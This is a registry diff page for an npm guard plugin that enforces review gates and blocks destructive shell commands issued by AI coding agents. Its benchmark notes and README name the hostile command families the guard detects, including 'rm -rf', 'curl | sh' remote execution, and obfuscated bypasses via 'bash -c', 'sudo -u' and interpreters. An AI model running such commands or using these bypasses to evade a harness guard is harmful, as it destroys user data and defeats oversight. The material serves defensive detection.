npm - opencode-goal-mode - Versions diffs - 0.2.1 → 0.2.2 - Mend

opencode-goal-mode 0.2.1 → 0.2.2

This diff shows the content of publicly available package versions released to one of the supported registries. It is provided for informational purposes only and reflects the changes between package versions as they appear in their public registries.

Files changed (13)

package/CHANGELOG.md +8 -0
package/README.md +14 -11
package/docs/benchmarks/capability-matrix.svg +86 -0
package/docs/benchmarks/detection-by-family.svg +37 -0
package/docs/benchmarks/latency.svg +13 -0
package/docs/benchmarks/overall-scorecard.svg +32 -0
package/docs/benchmarks/results.json +77 -0
package/package.json +4 -1
package/research/README.md +18 -0
package/research/benchmarks.md +63 -0
package/research/goal-mode-comparison.md +100 -0
package/research/opencode-plugin-platform.md +89 -0
package/research/shell-hardening.md +62 -0

package/CHANGELOG.md ADDED

@@ -0,0 +1,8 @@
+# Changelog
+## v0.2.2
+- Refresh source-backed research notes for OpenCode plugin/runtime facts and the Claude Code/Codex comparison.
+- Regenerate benchmark results and charts from the current shell-guard corpus.
+- Scope benchmark and safety claims to avoid overclaiming beyond the tested bypass corpus.
+- Align release documentation with the `NPM_TOKEN`-based publish workflow.

package/README.md CHANGED

@@ -14,7 +14,8 @@ Most "goal mode" / agentic setups are **prompt-only**: the model is *asked* to
 review its work and to keep going until done. Goal Mode adds a guard plugin that
 makes that discipline **mechanical at the harness layer** — the model cannot
 declare `Goal Completed` until the required reviews actually passed, and it
-cannot run a destructive command that a regex guard would miss.
+is blocked from the benchmarked destructive-command bypasses that a regex guard
+would miss.
 ![Mechanically-enforced goal discipline vs. Claude Code and Codex](docs/benchmarks/capability-matrix.svg)
@@ -29,8 +30,8 @@ honest caveats, in [research/goal-mode-comparison.md](research/goal-mode-compari
   code review is advisory.
 - **An edit automatically invalidates prior approvals.** A reviewer gate counts
   only when its PASS is newer (by a monotonic integer sequence) than the last
-  edit — so any change forces the relevant reviews to re-run. Neither Claude Code
-  nor Codex ships this stale-review invariant.
+  edit — so any change forces the relevant reviews to re-run. The public Claude
+  Code and Codex docs reviewed do not describe this stale-review invariant.
 - **Required specialist reviews are auto-selected and enforced** (security, api,
   data, performance …) from the goal text, contract, and changed files — not left
   to the model's discretion.
@@ -40,7 +41,7 @@ honest caveats, in [research/goal-mode-comparison.md](research/goal-mode-compari
 ### Benchmark: shell-guard accuracy
 The guard replaced a boundary-anchored regex classifier. On a labeled corpus of
-71 real commands (`npm run bench`, reproducible — see
+71 real commands (`npm run bench` from a repository checkout, reproducible — see
 [research/benchmarks.md](research/benchmarks.md)):
 ![Destructive-command detection rate by family](docs/benchmarks/detection-by-family.svg)
@@ -54,8 +55,9 @@ The guard replaced a boundary-anchored regex classifier. On a labeled corpus of
 | Obfuscated bypasses caught (`$(…)`, `bash -c`, `sudo -u`, interpreters) | 0% | 100% |
 | Remote exec (`curl \| sh`) caught | 0% | 100% |
-The deeper analysis costs ~0.6 µs more per command (~500,000 classifications/
-second) — negligible for a per-tool-call guard:
+The deeper analysis costs a few microseconds per command on this machine
+(hundreds of thousands of classifications per second) — negligible for a
+per-tool-call guard:
 ![Per-command analysis latency](docs/benchmarks/latency.svg)
@@ -200,21 +202,22 @@ opencode-goal-mode-install --global
 ```
 Publishing is handled by `.github/workflows/publish.yml`, which runs on Node 24
-with `id-token: write` for Trusted Publishing. The workflow validates the
+and publishes with the `NPM_TOKEN` repository secret. The workflow validates the
 package, checks the tag matches `package.json`, verifies the version is not
 already on npm, then publishes. Manual workflow dispatch defaults to
 `npm publish --dry-run`.
-Release flow:
+Release flow for a new version:
 ```bash
 npm version patch
 git push --follow-tags
 ```
-Then create a GitHub Release from the pushed tag (e.g. `v0.1.1`). For
-token-based publishing instead of Trusted Publishing, add a repository secret
-`NPM_TOKEN` with publish rights.
+For a version that is already bumped and reviewed, commit the current tree, tag
+the reviewed version (for example `v0.2.2`), push the branch and tag, then create
+the GitHub Release. Ensure `NPM_TOKEN` has npm publish rights before publishing
+the release.
 ## Goal Completion Contract

package/docs/benchmarks/capability-matrix.svg ADDED

@@ -0,0 +1,86 @@
+<svg xmlns="http://www.w3.org/2000/svg" width="760" height="496" viewBox="0 0 760 496" font-family="-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif">
+<rect width="760" height="496" fill="#ffffff"/>
+<text x="20" y="28" font-size="17" font-weight="700" fill="#1f2328">Mechanically-enforced goal discipline</text>
+<text x="20" y="47" font-size="12" fill="#656d76">Enforced = guaranteed by the harness; Prompt-only / Partial = depends on the model or user config.</text>
+<text x="374.0" y="62" font-size="12.5" font-weight="700" text-anchor="middle" fill="#1f2328">Goal Mode</text>
+<text x="522.0" y="62" font-size="12.5" font-weight="700" text-anchor="middle" fill="#1f2328">Claude Code</text>
+<text x="670.0" y="62" font-size="12.5" font-weight="700" text-anchor="middle" fill="#1f2328">Codex</text>
+<text x="286" y="93" font-size="12" text-anchor="end" fill="#1f2328">Autonomous goal loop</text>
+<rect x="304.0" y="74" width="140.0" height="30" rx="4" fill="#dbe9d5"/>
+<text x="374.0" y="93" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Prompt-only</text>
+<rect x="452.0" y="74" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="93" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="74" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="670.0" y="93" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<text x="286" y="131" font-size="12" text-anchor="end" fill="#1f2328">Review gate before “done”</text>
+<rect x="304.0" y="112" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="131" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="112" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="131" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="112" width="140.0" height="30" rx="4" fill="#dbe9d5"/>
+<text x="670.0" y="131" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Prompt-only</text>
+<text x="286" y="169" font-size="12" text-anchor="end" fill="#1f2328">Contextual specialist reviews</text>
+<rect x="304.0" y="150" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="169" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="150" width="140.0" height="30" rx="4" fill="#dbe9d5"/>
+<text x="522.0" y="169" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Prompt-only</text>
+<rect x="600.0" y="150" width="140.0" height="30" rx="4" fill="#dbe9d5"/>
+<text x="670.0" y="169" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Prompt-only</text>
+<text x="286" y="207" font-size="12" text-anchor="end" fill="#1f2328">Stale-review invalidation on edit</text>
+<rect x="304.0" y="188" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="207" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="188" width="140.0" height="30" rx="4" fill="#eaeef2"/>
+<text x="522.0" y="207" font-size="11" font-weight="600" text-anchor="middle" fill="#656d76">None</text>
+<rect x="600.0" y="188" width="140.0" height="30" rx="4" fill="#eaeef2"/>
+<text x="670.0" y="207" font-size="11" font-weight="600" text-anchor="middle" fill="#656d76">None</text>
+<text x="286" y="245" font-size="12" text-anchor="end" fill="#1f2328">Completion-claim enforcement</text>
+<rect x="304.0" y="226" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="245" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="226" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="245" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="226" width="140.0" height="30" rx="4" fill="#eaeef2"/>
+<text x="670.0" y="245" font-size="11" font-weight="600" text-anchor="middle" fill="#656d76">None</text>
+<text x="286" y="283" font-size="12" text-anchor="end" fill="#1f2328">Destructive-command blocking</text>
+<rect x="304.0" y="264" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="283" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="264" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="283" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="264" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="670.0" y="283" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<text x="286" y="321" font-size="12" text-anchor="end" fill="#1f2328">Remote-exec (curl | sh) blocking</text>
+<rect x="304.0" y="302" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="321" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="302" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="321" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="302" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="670.0" y="321" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<text x="286" y="359" font-size="12" text-anchor="end" fill="#1f2328">Enforcement state survives restart</text>
+<rect x="304.0" y="340" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="359" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="340" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="359" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="340" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="670.0" y="359" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<text x="286" y="397" font-size="12" text-anchor="end" fill="#1f2328">State survives compaction</text>
+<rect x="304.0" y="378" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="397" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="378" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="397" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="378" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="670.0" y="397" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<text x="286" y="435" font-size="12" text-anchor="end" fill="#1f2328">Custom enforcement hooks/tools</text>
+<rect x="304.0" y="416" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="435" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="416" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="522.0" y="435" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="600.0" y="416" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="670.0" y="435" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="286" y="461" width="12" height="12" rx="2" fill="#2da44e"/>
+<text x="303" y="472" font-size="11.5" fill="#1f2328">Enforced</text>
+<rect x="372" y="461" width="12" height="12" rx="2" fill="#d4a72c"/>
+<text x="389" y="472" font-size="11.5" fill="#1f2328">Partial</text>
+<rect x="451" y="461" width="12" height="12" rx="2" fill="#dbe9d5"/>
+<text x="468" y="472" font-size="11.5" fill="#1f2328">Prompt-only</text>
+<rect x="558" y="461" width="12" height="12" rx="2" fill="#eaeef2"/>
+<text x="575" y="472" font-size="11.5" fill="#1f2328">None</text>
+</svg>

package/docs/benchmarks/detection-by-family.svg ADDED

@@ -0,0 +1,37 @@
+<svg xmlns="http://www.w3.org/2000/svg" width="720" height="380" viewBox="0 0 720 380" font-family="-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif">
+<rect width="720" height="380" fill="#ffffff"/>
+<text x="48" y="28" font-size="17" font-weight="700" fill="#1f2328">Destructive-command detection rate by family</text>
+<text x="48" y="47" font-size="12" fill="#656d76">Higher is better. Corpus: 48 destructive commands.</text>
+<line x1="48" y1="296.0" x2="700" y2="296.0" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="300.0" font-size="11" text-anchor="end" fill="#656d76">0%</text>
+<line x1="48" y1="249.6" x2="700" y2="249.6" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="253.6" font-size="11" text-anchor="end" fill="#656d76">20%</text>
+<line x1="48" y1="203.2" x2="700" y2="203.2" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="207.2" font-size="11" text-anchor="end" fill="#656d76">40%</text>
+<line x1="48" y1="156.8" x2="700" y2="156.8" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="160.8" font-size="11" text-anchor="end" fill="#656d76">60%</text>
+<line x1="48" y1="110.4" x2="700" y2="110.4" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="114.4" font-size="11" text-anchor="end" fill="#656d76">80%</text>
+<line x1="48" y1="64.0" x2="700" y2="64.0" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="68.0" font-size="11" text-anchor="end" fill="#656d76">100%</text>
+<rect x="56.0" y="64.0" width="96.7" height="232.0" rx="3" fill="#9aa0a6"/>
+<text x="104.3" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
+<rect x="160.7" y="64.0" width="96.7" height="232.0" rx="3" fill="#2da44e"/>
+<text x="209.0" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
+<text x="156.7" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">Classic</text>
+<rect x="273.3" y="296.0" width="96.7" height="0.0" rx="3" fill="#9aa0a6"/>
+<text x="321.7" y="291.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">0%</text>
+<rect x="378.0" y="64.0" width="96.7" height="232.0" rx="3" fill="#2da44e"/>
+<text x="426.3" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
+<text x="374.0" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">Obfuscated</text>
+<rect x="490.7" y="296.0" width="96.7" height="0.0" rx="3" fill="#9aa0a6"/>
+<text x="539.0" y="291.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">0%</text>
+<rect x="595.3" y="64.0" width="96.7" height="232.0" rx="3" fill="#2da44e"/>
+<text x="643.7" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
+<text x="591.3" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">Remote exec</text>
+<line x1="48" y1="296" x2="700" y2="296" stroke="#d0d7de" stroke-width="1.5"/>
+<rect x="48" y="344" width="12" height="12" rx="2" fill="#9aa0a6"/>
+<text x="66" y="354" font-size="12" fill="#1f2328">Legacy regex guard</text>
+<rect x="201.6" y="344" width="12" height="12" rx="2" fill="#2da44e"/>
+<text x="219.6" y="354" font-size="12" fill="#1f2328">Goal Mode analyzer</text>
+</svg>

package/docs/benchmarks/latency.svg ADDED

@@ -0,0 +1,13 @@
+<svg xmlns="http://www.w3.org/2000/svg" width="720" height="164" viewBox="0 0 720 164" font-family="-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif">
+<rect width="720" height="164" fill="#ffffff"/>
+<text x="20" y="28" font-size="17" font-weight="700" fill="#1f2328">Per-command analysis latency</text>
+<text x="20" y="47" font-size="12" fill="#656d76">Microseconds to classify one command. Both are negligible for a tool-call guard.</text>
+<text x="218" y="87" font-size="12" text-anchor="end" fill="#1f2328">Legacy regex guard</text>
+<rect x="230" y="70" width="420" height="22" rx="3" fill="#eaeef2"/>
+<rect x="230" y="70" width="202.0" height="22" rx="3" fill="#9aa0a6"/>
+<text x="440.0" y="87" font-size="12" font-weight="600" fill="#1f2328">2.62 µs</text>
+<text x="218" y="125" font-size="12" text-anchor="end" fill="#1f2328">Goal Mode analyzer</text>
+<rect x="230" y="108" width="420" height="22" rx="3" fill="#eaeef2"/>
+<rect x="230" y="108" width="300.0" height="22" rx="3" fill="#2da44e"/>
+<text x="538.0" y="125" font-size="12" font-weight="600" fill="#1f2328">3.89 µs</text>
+</svg>

package/docs/benchmarks/overall-scorecard.svg ADDED

@@ -0,0 +1,32 @@
+<svg xmlns="http://www.w3.org/2000/svg" width="720" height="380" viewBox="0 0 720 380" font-family="-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif">
+<rect width="720" height="380" fill="#ffffff"/>
+<text x="48" y="28" font-size="17" font-weight="700" fill="#1f2328">Overall guard accuracy</text>
+<text x="48" y="47" font-size="12" fill="#656d76">Detection rate (higher better) vs false-positive rate (lower better).</text>
+<line x1="48" y1="296.0" x2="700" y2="296.0" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="300.0" font-size="11" text-anchor="end" fill="#656d76">0%</text>
+<line x1="48" y1="249.6" x2="700" y2="249.6" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="253.6" font-size="11" text-anchor="end" fill="#656d76">20%</text>
+<line x1="48" y1="203.2" x2="700" y2="203.2" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="207.2" font-size="11" text-anchor="end" fill="#656d76">40%</text>
+<line x1="48" y1="156.8" x2="700" y2="156.8" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="160.8" font-size="11" text-anchor="end" fill="#656d76">60%</text>
+<line x1="48" y1="110.4" x2="700" y2="110.4" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="114.4" font-size="11" text-anchor="end" fill="#656d76">80%</text>
+<line x1="48" y1="64.0" x2="700" y2="64.0" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="68.0" font-size="11" text-anchor="end" fill="#656d76">100%</text>
+<rect x="56.0" y="247.7" width="151.0" height="48.3" rx="3" fill="#9aa0a6"/>
+<text x="131.5" y="242.7" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">21%</text>
+<rect x="215.0" y="64.0" width="151.0" height="232.0" rx="3" fill="#2da44e"/>
+<text x="290.5" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
+<text x="211.0" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">Detection rate</text>
+<rect x="382.0" y="245.6" width="151.0" height="50.4" rx="3" fill="#9aa0a6"/>
+<text x="457.5" y="240.6" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">22%</text>
+<rect x="541.0" y="296.0" width="151.0" height="0.0" rx="3" fill="#2da44e"/>
+<text x="616.5" y="291.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">0%</text>
+<text x="537.0" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">False-positive rate</text>
+<line x1="48" y1="296" x2="700" y2="296" stroke="#d0d7de" stroke-width="1.5"/>
+<rect x="48" y="344" width="12" height="12" rx="2" fill="#9aa0a6"/>
+<text x="66" y="354" font-size="12" fill="#1f2328">Legacy regex guard</text>
+<rect x="201.6" y="344" width="12" height="12" rx="2" fill="#2da44e"/>
+<text x="219.6" y="354" font-size="12" fill="#1f2328">Goal Mode analyzer</text>
+</svg>

package/docs/benchmarks/results.json ADDED

@@ -0,0 +1,77 @@
+{
+  "corpusSize": 71,
+  "destructiveCount": 48,
+  "safeCount": 23,
+  "legacy": {
+    "detectionRate": 20.833333333333336,
+    "falsePositiveRate": 21.73913043478261,
+    "destCaught": 10,
+    "destTotal": 48,
+    "safeFalsePos": 5,
+    "safeTotal": 23,
+    "families": {
+      "classic": {
+        "destTotal": 10,
+        "destCaught": 10,
+        "safeTotal": 0,
+        "safeFalsePos": 0
+      },
+      "bypass": {
+        "destTotal": 35,
+        "destCaught": 0,
+        "safeTotal": 0,
+        "safeFalsePos": 0
+      },
+      "remote-exec": {
+        "destTotal": 3,
+        "destCaught": 0,
+        "safeTotal": 0,
+        "safeFalsePos": 0
+      },
+      "safe": {
+        "destTotal": 0,
+        "destCaught": 0,
+        "safeTotal": 23,
+        "safeFalsePos": 5
+      }
+    },
+    "opsPerSec": 381490,
+    "usPerCommand": 2.62
+  },
+  "current": {
+    "detectionRate": 100,
+    "falsePositiveRate": 0,
+    "destCaught": 48,
+    "destTotal": 48,
+    "safeFalsePos": 0,
+    "safeTotal": 23,
+    "families": {
+      "classic": {
+        "destTotal": 10,
+        "destCaught": 10,
+        "safeTotal": 0,
+        "safeFalsePos": 0
+      },
+      "bypass": {
+        "destTotal": 35,
+        "destCaught": 35,
+        "safeTotal": 0,
+        "safeFalsePos": 0
+      },
+      "remote-exec": {
+        "destTotal": 3,
+        "destCaught": 3,
+        "safeTotal": 0,
+        "safeFalsePos": 0
+      },
+      "safe": {
+        "destTotal": 0,
+        "destCaught": 0,
+        "safeTotal": 23,
+        "safeFalsePos": 0
+      }
+    },
+    "opsPerSec": 256879,
+    "usPerCommand": 3.89
+  }
+}
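
The headline percentages quoted in the README and in `research/benchmarks.md` can be rechecked from the raw counts in `results.json`. The following is a minimal sketch, assuming the rates are plain ratios of the recorded counts; the `percent` and `summarize` helpers are hypothetical names introduced for illustration and are not part of the package.

```javascript
// Counts and latencies copied from docs/benchmarks/results.json above.
const results = {
  legacy: { destCaught: 10, destTotal: 48, safeFalsePos: 5, safeTotal: 23, usPerCommand: 2.62 },
  current: { destCaught: 48, destTotal: 48, safeFalsePos: 0, safeTotal: 23, usPerCommand: 3.89 },
};

// Hypothetical helper: a percentage that tolerates an empty denominator.
function percent(part, total) {
  return total === 0 ? 0 : (part / total) * 100;
}

// Hypothetical helper: derive both rates from one results entry.
function summarize(entry) {
  return {
    detectionRate: percent(entry.destCaught, entry.destTotal),
    falsePositiveRate: percent(entry.safeFalsePos, entry.safeTotal),
  };
}

const legacy = summarize(results.legacy);
const current = summarize(results.current);

// Extra analysis cost per command in this recorded run, in microseconds.
const extraMicros = results.current.usPerCommand - results.legacy.usPerCommand;

console.log(legacy.detectionRate.toFixed(1));     // "20.8"
console.log(legacy.falsePositiveRate.toFixed(1)); // "21.7"
console.log(current.detectionRate, current.falsePositiveRate); // 100 0
console.log(extraMicros.toFixed(2));              // "1.27"
```

The latency difference printed here applies only to the run recorded in this file; as the benchmark notes say, latency varies by machine while the accuracy counts do not.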

package/package.json CHANGED

@@ -1,6 +1,6 @@
 {
   "name": "opencode-goal-mode",
-  "version": "0.2.1",
+  "version": "0.2.2",
   "description": "Strict Goal Mode agents, commands, and guard plugin for OpenCode.",
   "type": "module",
   "engines": {
@@ -13,9 +13,12 @@
   "files": [
     "agents/",
     "commands/",
+    "docs/",
     "plugins/",
+    "research/",
     "scripts/install.mjs",
     "ARCHITECTURE.md",
+    "CHANGELOG.md",
     "LICENSE",
     "README.md"
   ],

package/research/README.md ADDED

@@ -0,0 +1,18 @@
+# Research
+Background research that informs the Goal Mode design. These are working
+references, kept so the rationale behind the plugin is auditable and the
+platform facts are recoverable. They are shipped as reference docs so README
+links resolve in the npm package, but they are not runtime files.
+| Document | What it covers |
+| --- | --- |
+| [opencode-plugin-platform.md](opencode-plugin-platform.md) | Verified OpenCode plugin-runtime facts (hooks, discovery, permissions, tools) from `@opencode-ai/plugin@1.15.13` source. The pinned runtime reference the plugin is built against. |
+| [goal-mode-comparison.md](goal-mode-comparison.md) | How Goal Mode's mechanical enforcement compares to Claude Code and OpenAI Codex, with citations and honest caveats. |
+| [shell-hardening.md](shell-hardening.md) | The shell-analyzer threat model: the bypass classes the old regex guard missed and how the tokenizer closes each. |
+| [benchmarks.md](benchmarks.md) | Benchmark methodology and results (detection rate, false positives, latency). Reproduce with `npm run bench`. |
+Every non-obvious platform claim in these documents was verified against the
+installed `@opencode-ai/plugin` type definitions and/or the `sst/opencode`
+source at tag `v1.15.13`. Where a fact is version-specific (e.g. the dormant
+`permission.ask` hook) it is called out as such.

package/research/benchmarks.md ADDED

@@ -0,0 +1,63 @@
+# Benchmarks
+Reproducible measurement of the destructive-command guard from a repository
+checkout. Run:
+```bash
+npm run bench          # detection / false-positive / latency benchmark
+npm run bench:compare  # regenerate the capability-comparison chart
+```
+`npm run bench` writes `docs/benchmarks/results.json` and the SVG charts the
+README embeds.
+## Methodology
+- **Corpus** (`benchmarks/corpus.mjs`): 71 real shell commands a coding agent
+  might emit, each labeled `destructive` (a guard must block) or `safe` (a guard
+  must not block). Split into families: *classic* (plain `rm -rf`, `git reset
+  --hard`), *obfuscated* (the bypass corpus — substitutions, wrappers, `bash -c`,
+  interpreters, weaponized git), *remote-exec* (`curl | sh`), and *safe*
+  (read-only and quoted-text commands, including ones the old guard
+  false-positived).
+- **Baseline** (`benchmarks/legacy-analyzer.mjs`): the original regex classifier,
+  preserved **verbatim** from the first published release (commit `130956d`), so
+  the comparison is apples-to-apples against the same code that shipped.
+- **A command counts as "blocked"** when the analyzer flags it `destructive` or
+  `networkExec` (the two signals `tool.execute.before` throws on). `mutating`
+  marks the session dirty but does not block, so it is not counted here.
+- **Metrics**: detection rate (recall over destructive commands),
+  false-positive rate (safe commands wrongly blocked), and per-command latency.
+## Results
+Representative run (Node 22, single-threaded; latency varies by machine, the
+accuracy figures do not):
+| Metric | Legacy regex guard | Goal Mode analyzer |
+| --- | --- | --- |
+| Detection rate | **20.8%** (10/48) | **100%** (48/48) |
+| False-positive rate | **21.7%** (5/23) | **0%** (0/23) |
+| Detection — classic | 100% | 100% |
+| Detection — obfuscated | 0% (0/35) | 100% (35/35) |
+| Detection — remote-exec | 0% (0/3) | 100% (3/3) |
+| Latency per command | ~2.3 µs | ~3.8 µs |
+The legacy guard catches only the *classic* family and misses every obfuscated
+and remote-execution command, while wrongly blocking 1-in-5 benign commands. The
+tokenizer catches the entire corpus with zero false positives, for an extra
+~1.5 µs per command on this run — negligible for a per-tool-call guard (still
+hundreds of thousands of classifications per second).
+## Honesty notes
+- The corpus is hand-built to exercise the known bypass classes; it is a
+  capability benchmark, not a claim of catching *every* possible obfuscation
+  (the analyzer fails open on un-analyzable dynamic commands — see
+  [shell-hardening.md](shell-hardening.md)).
+- The latency comparison is intentionally shown even though the new analyzer is
+  slower: the win is accuracy, and the parse cost is still only a few
+  microseconds per tool-call candidate.
+- "100% on this corpus" means 100% of the labeled set; new bypass classes that
+  are discovered get added to the corpus and fixed (that is how the second-wave
+  findings — `sudo -u`, `pnpm dlx`, interpreter shell-out — entered it).
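
The scoring rule in the methodology (a command counts as blocked when it is flagged `destructive` or `networkExec`, while `mutating` alone does not block) can be sketched as a small loop over a labeled corpus. This is an illustration under stated assumptions only: the five-entry corpus and the `toyAnalyze` function below are hypothetical stand-ins, not the contents of `benchmarks/corpus.mjs` and not the package's tokenizer.

```javascript
// Toy stand-in corpus; the real corpus is not reproduced here.
const toyCorpus = [
  { command: "rm -rf build", label: "destructive" },
  { command: "curl https://example.com/install.sh | sh", label: "destructive" },
  { command: "git status", label: "safe" },
  { command: "echo 'rm -rf /'", label: "safe" },
  { command: "touch notes.txt", label: "safe" },
];

// Hypothetical, deliberately naive analyzer that returns the three signals
// named in the methodology. It only serves to exercise the scoring loop.
function toyAnalyze(command) {
  const words = command.trim().split(/\s+/);
  return {
    destructive: words[0] === "rm" && words.includes("-rf"),
    networkExec: /\|\s*(sh|bash)\s*$/.test(command),
    mutating: words[0] === "touch",
  };
}

// Only the two blocking signals count; `mutating` is ignored for scoring.
function isBlocked(signals) {
  return signals.destructive || signals.networkExec;
}

// Tally detection (recall over destructive) and false positives (over safe).
function score(entries, analyze) {
  let destTotal = 0;
  let destCaught = 0;
  let safeTotal = 0;
  let safeFalsePos = 0;
  for (const { command, label } of entries) {
    const blocked = isBlocked(analyze(command));
    if (label === "destructive") {
      destTotal += 1;
      if (blocked) destCaught += 1;
    } else {
      safeTotal += 1;
      if (blocked) safeFalsePos += 1;
    }
  }
  return {
    destTotal,
    destCaught,
    safeTotal,
    safeFalsePos,
    detectionRate: destTotal ? (destCaught / destTotal) * 100 : 0,
    falsePositiveRate: safeTotal ? (safeFalsePos / safeTotal) * 100 : 0,
  };
}

const toyScore = score(toyCorpus, toyAnalyze);
console.log(toyScore);
```

A perfect score on this toy set says nothing about other inputs, which is the same limit the honesty notes place on the real corpus.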

package/research/goal-mode-comparison.md ADDED

@@ -0,0 +1,100 @@
+# Goal Mode vs. Claude Code vs. Codex
+How OpenCode Goal Mode's **mechanically-enforced** goal discipline compares to
+Anthropic's Claude Code and OpenAI's Codex. Sourced from Claude Code docs
+(`https://docs.anthropic.com/en/docs/claude-code/hooks` and `/security`) and
+OpenAI Codex docs (`https://developers.openai.com/codex/cli` and `/cloud`),
+cross-checked against this plugin's source. The emphasis throughout is
+*mechanical enforcement* — what the harness guarantees — versus *prompt-driven*
+behavior the model is asked to do.
+## The distinction that matters
+All three tools run a **model-driven** agentic loop. Public docs reviewed do not
+describe a default mechanical proof that forces the model to keep working until
+all project-specific acceptance criteria are externally verified. Goal Mode's
+loop is prompt-only too.
+What separates the three is what happens at the **completion boundary** and the
+**tool boundary**:
+- **Claude Code** has the richest first-party *mechanical* surface
+  (PreToolUse/Stop/PostToolUse hooks, permission deny rules, sandboxing) — but
+  review and completion enforcement are **opt-in**, requiring user-authored
+  hooks. Out of the box, review is prompt-driven and the model stops when it
+  judges the work done.
+- **Codex** has approval modes, local code review, and cloud environments that
+  isolate work from the user's machine — genuinely strong mode-level boundaries
+  Goal Mode does not claim — but public docs do not describe a harness-level
+  `Goal Completed` blocker or stale-review invalidation invariant.
+- **Goal Mode** ships a coherent **completion contract** and **command guard**
